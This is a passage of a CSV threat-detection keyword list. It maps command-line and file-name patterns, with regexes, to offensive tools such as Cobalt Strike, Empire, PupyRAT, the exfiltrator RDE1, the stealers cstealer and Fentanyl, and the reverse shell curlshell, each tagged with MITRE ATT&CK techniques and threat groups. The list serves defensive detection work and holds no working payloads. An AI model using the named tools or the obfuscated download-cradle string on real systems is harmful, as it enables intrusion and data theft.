crde_linux_aarch64 https -*",".{0,1000}\scrde_linux_aarch64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","718" "* crde_linux_x86_64 https -*",".{0,1000}\scrde_linux_x86_64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","719" "* crde_macos https -*",".{0,1000}\scrde_macos\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","720" "* crde_release https -*",".{0,1000}\scrde_release\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","721" "* crde_windows https -*",".{0,1000}\scrde_windows\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS 
protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","722" "* crde_windows_x64 https -*",".{0,1000}\scrde_windows_x64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","723" "* crde_windows_x86 https -*",".{0,1000}\scrde_windows_x86\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","724" "* Create-HotKeyLNK.ps1*",".{0,1000}\sCreate\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","727" "* CreateObject(""W""+""S""+""cr""+""ip""+""t.""+""S""+""h""+""e""+""l""+""l"")*",".{0,1000}\sCreateObject\(\""W\""\+\""S\""\+\""cr\""\+\""ip\""\+\""t\.\""\+\""S\""\+\""h\""\+\""e\""\+\""l\""\+\""l\""\).{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","728" "* createproxydll.sh*",".{0,1000}\screateproxydll\.sh.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","729" "* --createpub -n 7828374823761928712873129873981723...12837182 -e 65537*",".{0,1000}\s\-\-createpub\s\-n\s7828374823761928712873129873981723\.\.\.12837182\s\-e\s65537.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","730" "* Cred_Dump.sh*",".{0,1000}\sCred_Dump\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","731" "* creddump.py*",".{0,1000}\screddump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 
- T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","732" "* credentials /pvk:*",".{0,1000}\scredentials\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","733" "* credmaster.py*",".{0,1000}\scredmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","734" "* credmaster-success.txt*",".{0,1000}\scredmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","735" "* credmaster-validusers.txt*",".{0,1000}\scredmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential 
Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","736" "* creds-summary.nse*",".{0,1000}\screds\-summary\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","737" "* CRITICAL] Suspicous file: \\*",".{0,1000}\sCRITICAL\]\sSuspicous\sfile\:\s\\\\.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","738" "*- Cronos rootkit debugger -*",".{0,1000}\-\sCronos\srootkit\sdebugger\s\-.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","740" "* CrossC2 Listener*",".{0,1000}\sCrossC2\sListener.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","741" "* 
CrossC2.*",".{0,1000}\sCrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","742" "* CrossC2Kit *",".{0,1000}\sCrossC2Kit\s.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","0","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","743" "* CSExec.py*",".{0,1000}\sCSExec\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","744" "* 
-CShardDLLBytes*",".{0,1000}\s\-CShardDLLBytes.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","745" "* cstealer.py*",".{0,1000}\scstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. 
app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","747" "* ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Reconnaissance","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","N/A","10","2015","297","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z","748" "* cups-info.nse*",".{0,1000}\scups\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","749" "* cups-queue-info.nse*",".{0,1000}\scups\-queue\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","750" "* curlshell.py*",".{0,1000}\scurlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","751" "* cursorinit.vbs*",".{0,1000}\scursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","752" "* --custom_user_agent*",".{0,1000}\s\-\-custom_user_agent.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","753" "* --custom-steal",".{0,1000}\s\-\-custom\-steal","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","754" "* --custom-steal listusers*",".{0,1000}\s\-\-custom\-steal\slistusers.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","755" "* --custom-steal onedrive*",".{0,1000}\s\-\-custom\-steal\sonedrive.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","756" "* --custom-steal onenote*",".{0,1000}\s\-\-custom\-steal\sonenote.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","757" "* --custom-steal outlook*",".{0,1000}\s\-\-custom\-steal\soutlook.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","758" "* --cve=* --command*",".{0,1000}\s\-\-cve\=.{0,1000}\s\-\-command.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","759" "* CVE-2023-38831-RaRCE*",".{0,1000}\sCVE\-2023\-38831\-RaRCE.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","760" "* cvs-brute.nse*",".{0,1000}\scvs\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","761" "* cvs-brute-repository.nse*",".{0,1000}\scvs\-brute\-repository\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","762" "* -d * -dc * -nu 'neo4j' -np *",".{0,1000}\s\-d\s.{0,1000}\s\-dc\s.{0,1000}\s\-nu\s\'neo4j\'\s\-np\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","763" "* -d * -n * -m reverse*=",".{0,1000}\s\-d\s.{0,1000}\s\-n\s.{0,1000}\s\-m\sreverse.{0,1000}\=","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","N/A","6","540","181","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z","764" "* -d * -n * -m rot13*",".{0,1000}\s\-d\s.{0,1000}\s\-n\s.{0,1000}\s\-m\srot13.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","N/A","6","540","181","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z","765" "* -d * -t axfr >*",".{0,1000}\s\-d\s.{0,1000}\s\-t\saxfr\s\>.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - 
T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","766" "* -d * -t zonewalk > *",".{0,1000}\s\-d\s.{0,1000}\s\-t\szonewalk\s\>\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","767" "* -d * -t zonewalk*",".{0,1000}\s\-d\s.{0,1000}\s\-t\szonewalk.{0,1000}","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Reconnaissance","https://github.com/darkoperator/dnsrecon","1","0","#linux","N/A","6","10","2755","556","2025-04-18T05:31:08Z","2010-12-16T03:25:49Z","768" "* -d * -u * -p * --listener * --target *$DC_HOST*",".{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-listener\s.{0,1000}\s\-\-target\s.{0,1000}\$DC_HOST.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","769" "* -d * -u *\* -p * --da*",".{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\\.{0,1000}\s\-p\s.{0,1000}\s\-\-da.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and 
